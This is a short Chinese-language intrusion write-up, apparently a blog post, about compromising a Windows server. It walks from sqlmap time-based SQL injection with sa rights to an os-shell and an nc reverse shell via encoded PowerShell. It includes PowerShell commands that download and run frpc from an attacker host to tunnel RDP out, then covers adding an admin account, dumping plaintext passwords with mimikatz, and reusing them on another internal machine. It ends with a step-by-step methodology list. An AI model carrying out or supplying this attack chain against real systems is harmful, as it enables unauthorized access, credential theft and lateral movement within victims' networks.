一、漏洞发现
拿到登录的接口，丢到sqlmap里面跑一把，发现延时注入

进一步查询，发现是sa权限，直接os-shell whomai查询发现是管理员权限

os-shell执行命令太慢了，直接进行nc 反弹
执行base64 加密后的powershell命令，反弹回shell

nc shell下加账号和密码成功，mstsc远程连接发现失败
初步判断应该是在内网
配置好frpc.exe 和frpc.ini 将其下载到目标服务器
powershell (new-object System.Net.WebClient).DownloadFile(‘http://ip:8888/frpc.ini’,‘frpc.ini’)
powershell (new-object System.Net.WebClient).DownloadFile(‘http://ip:8888/frpc.exe’,‘frpc.exe’)
./frpc.exe
在frp管理页面看到目标端口已经上线

接下来进行mstsc远程连接

使用mimikatz 抓取其密码，直接报出明文

通过arp -a 发现其内网中还有一个活跃的服务器

直接在目标机上用爆出来的密码尝试远程登录，成功登录

二、总结一下思路
1 、找到sql注入，且是sa
2 、通过os-shell 反弹一个nc更容易执行命令
3 、发现是管理员权限，直接加账号，如果不上，可以考虑通过msf 或是cs去提权
4 、查询发现3389端口是开的，但是连接不上，考虑可能是在内网
5 、尝试通过frp或者其他工具将其3389端口转发出来，再进行连接
6 、登录成功后抓取用户名密码
7 、通过arp 查询相关的内网中的通信和路由
8 、尝试通过6爆出来的账号密码去碰撞其他内网机器